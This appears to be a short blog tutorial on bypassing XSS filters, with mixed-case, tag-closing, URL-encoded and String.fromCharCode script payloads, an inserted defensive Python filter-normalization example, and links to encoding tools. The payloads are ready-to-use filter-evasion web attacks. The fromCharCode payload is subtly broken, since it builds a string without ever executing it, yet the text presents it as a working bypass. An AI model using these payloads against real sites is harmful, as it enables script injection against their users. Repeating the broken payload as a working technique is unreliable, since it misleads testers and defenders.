0x001
The simplest technique is to change the case.
During a test, we can change the case of the test payload to bypass case-sensitive XSS rules.
For example, <script>alert("xss");</script> can be converted to:
<ScRipt>ALeRt("XSS");</sCRipT>
0x002
You can also close the tag first.
Sometimes we need to close the enclosing tag for our XSS to take effect, for example:
"><script>alert("Hi");</script>
0x003
Bypass with HEX (URL) encoding
We can encode our payload to bypass the XSS rules.
For example, <script>alert("xss");</script> can be converted to:
%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%22%78%73%73%22%29%3b%3c%2f%73%63%72%69%70%74%3e
0x004
Bypass magic_quotes_gpc
magic_quotes_gpc = On is a security setting in PHP. When it is enabled, certain special characters are escaped with a backslash: ' (single quote) becomes \', " (double quote) becomes \", and \ becomes \\.
For example, <script>alert("xss");</script> is converted to <script>alert(\"xss\");</script>, so our XSS no longer takes effect.
For websites with magic_quotes_gpc enabled, we can bypass it with the String.fromCharCode method in JavaScript. We can convert alert("XSS") to
String.fromCharCode(97,108,101,114,116,40,34,88,83,83,34,41), and then our XSS statement becomes:
<script>String.fromCharCode(97,108,101,114,116,40,34,88,83,83,34,41,59)</script>
String.fromCharCode() is a String method in JavaScript that converts ASCII codes into a string.
Finally, wrap the converted content in <script>converted content here</script> to include it.
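The four techniques above all defeat a filter that matches the raw input literally. As an added example (not from the original post), the following Python normalizes input the way a defender's filter or WAF rule should, by lowercasing, URL-decoding until the value stops changing (this goes slightly beyond the page by also handling double encoding), and undoing backslash escaping, before matching; the sample inputs are constructed here and the pattern names are assumptions.

```python
import re
from urllib.parse import unquote

# Constructed sample inputs: the page's variants plus a double-encoded and a benign value.
SAMPLES = {
    "plain": '<script>alert("xss");</script>',
    "mixed_case": '<ScRipt>ALeRt("XSS");</sCRipT>',
    "tag_close": '"><script>alert("Hi");</script>',
    "url_encoded": "%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%22%78%73%73%22%29%3b"
                   "%3c%2f%73%63%72%69%70%74%3e",
    "double_encoded": "%253c%2573%2563%2572%2569%2570%2574%253e",
    "magic_quotes": '<script>alert(\\"xss\\");</script>',  # as stored after magic_quotes_gpc
    "benign": "Hello, <b>world</b>",
}

# Naive rule: a case-sensitive literal match on the raw, undecoded input.
NAIVE = re.compile(r"<script>")

def naive_check(raw: str) -> bool:
    """Flag input only if it literally contains '<script>' (what the page bypasses)."""
    return bool(NAIVE.search(raw))

def normalize(raw: str, max_rounds: int = 3) -> str:
    """Canonicalize input before matching: decode %XX repeatedly, strip
    backslash-escaped quotes, and lowercase. Bounded rounds prevent
    endless decoding of pathological input."""
    s = raw
    for _ in range(max_rounds):
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    s = s.replace('\\"', '"').replace("\\'", "'")
    return s.lower()

# Robust rule: applied to the normalized form, tolerant of whitespace inside the tag,
# and also flagging String.fromCharCode(...) which the page uses to hide string literals.
ROBUST = re.compile(r"<\s*/?\s*script\b|fromcharcode\s*\(")

def robust_check(raw: str) -> bool:
    """Flag input if the normalized form contains a script tag or fromCharCode call."""
    return bool(ROBUST.search(normalize(raw)))

if __name__ == "__main__":
    for name, value in SAMPLES.items():
        print(f"{name:15} naive={naive_check(value)!s:5} robust={robust_check(value)}")
```

Matching on normalized input is a detection aid only; the durable fix is context-appropriate output encoding of untrusted data, which none of the page's variants can bypass.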
HEX encoding online tools:
http://textmechanic.com/ASCII-Hex-Unicode-Base64-Converter.html
http://www.asciitohex.com/